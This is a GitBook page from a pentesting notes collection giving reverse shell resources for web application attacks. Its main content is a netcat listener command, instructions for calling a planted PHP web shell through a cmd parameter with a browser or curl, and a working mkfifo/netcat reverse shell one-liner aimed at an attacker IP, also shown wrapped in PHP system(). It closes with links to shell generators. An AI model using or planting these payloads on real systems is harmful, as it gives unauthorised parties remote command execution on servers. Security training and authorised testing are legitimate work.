The VX-Files
The VX-Files
  • README.txt
  • For updates, questions, suggestions or just chatting: @malcrvz
  • Download your own local copy or check my other libre projects: Github/malcrvz
  • ๐Ÿ“•Cybersecurity Theory
    • Index
      • Malware types
        • Viruses, worms and Trojans
        • Backdoors, Rootkits and Spyware
        • Botnets, DDoS and Spammer
        • Ransomware
        • Scareware and Adware/PUP/PUA
        • Downloaders and Launchers
        • Hacktool
        • APT - Advanced Persistent Threat
      • Social engineering techniques
        • Phishing
        • Pretexting
        • Baiting
        • Quid pro quo
        • Tailgating
      • Cryptography
        • Hash functions
        • Symmetric, Asymmetric and Hybrid cryptography
        • Digital signatures & Digital certificates
        • TLS Protocol
      • Pentesting methodology & Techniques
        • CIA Triad - Confidentiality, Integrity & Availability
        • The methodology steps
        • Pre-Engagement
        • Information Gathering
          • HTTP status codes
          • robots.txt
        • Vulnerability Assessment
        • Exploitation
          • Password cracking
        • Post-Exploitation & Persistence
          • Types of Shells
        • Privilege Escalation & Lateral Movement
        • Reporting & Remediation
  • ๐ŸงLinux Essentials
    • Index
      • 1, 0, bits, Bytes: Units of digital information
      • User management
      • Packet management
      • Privileges & sudo
      • Passwd & Shadow files
      • Managing files, links and regex
      • find
      • Terminal/TTY
      • SSH
  • ๐ŸชŸWindows Essentials
    • Index
      • CLI user management
      • CMD File management
  • ๐ŸŒNetworking Essentials
    • Index
      • Windows CLI IP management
      • Linux IP management
      • Linux CLI Wi-Fi connection
  • ๐Ÿ•ธ๏ธNetwork Pentesting
    • Tools
      • 1. Pre-Engagement
        • OpenVPN
      • 2. Information gathering
        • cURL & wget
        • Nmap
        • arp
        • Netcat
        • whatweb
      • 3. Vulnerability assessment
        • smbclient
      • 4. Exploitation
        • Metasploit
        • Hashcat
        • John the Ripper
      • 5. Post-Exploitation & Persistence
        • SSH
      • 6. Privilege escalation & Lateral movement
        • Possible privilege escalation vectors - Auto-enumeration scripts
      • 7. Reporting & Remediation
    • Techniques
      • Upgrade reverse shell to interactive
      • Transferring files to/from remote victim
      • Possible privilege escalation vectors - Manual checklist
    • Resources
      • Manufacturer default passwords lists
        • IP Cameras
      • Get Shells
  • ๐Ÿ’‰Web App pentesting
    • Tools
      • CeWL
      • Gobuster
      • whatweb
    • Techniques
      • Command injection
    • Resources
      • Reverse Shells
      • Bind Shells
  • ๐Ÿ“กWireless pentesting
    • Tools
    • Techniques
    • Resources
  • ๐Ÿ”“On-Premises Pentesting
    • Tools
    • Techniques
      • Removing Linux user passwords
      • Removing Windows user passwords
    • Resources
  • ๐Ÿ’ฝDisks & Forensics
    • Index
      • Getting a disk ready
      • Inodes & Sectors
      • Recover deleted files
      • BUILDING - Secure file deletion
  • ๐Ÿ•ท๏ธBash scripts
    • coming soon
  • โšกPowerShell Scripts
    • coming soon
  • ๐ŸŸฉHTB Walkthroughs
    • coming soon
  • ๐Ÿดโ€โ˜ ๏ธExternal Resources
    • Schools
    • Books & Wikis
    • Utilities
    • Interactive cheat sheets
    • Wordlists
Powered by GitBook
On this page
  1. Web App pentesting
  2. Resources

Reverse Shells

Last updated 9 months ago

Command injection

To be able to execute the reverse shell we first need to be able to inject commands:

Default Webroot for common web servers
Apache    /var/www/html/
Nginx     /usr/local/nginx/html/
IIS       C:\inetpub\wwwroot\
XAMPP     C:\xampp\htdocs\
Accessing the reverse shell
#Listening for the reverse shell with netcat
nc -lnvp Port

#Once the malicious shell script is passed to the victim:
 ##In the browser
http://server_ip:port/shellScript.php?cmd=your_command_here

 ##Directly from the terminal
curl http://server_ip:port/shellScript.php?cmd=your_command_here

Scripts

PHP
#Get netcat reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackIP ListeningPort) >/tmp/f
 ##Adapted for PHP
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerIP listeningPort >/tmp/f"); ?>

Online shell lists/generators

Revshells

PayloadAllTheThings/Reverse

Command injection
๐Ÿ’‰
  • Command injection
  • Scripts
  • Online shell lists/generators
LogoPayloadsAllTheThings/Reverse Shell Cheatsheet.md at master ยท swisskyrepo/PayloadsAllTheThingsGitHub
PayloadAllTheThings
LogoOnline - Reverse Shell Generator
Revshells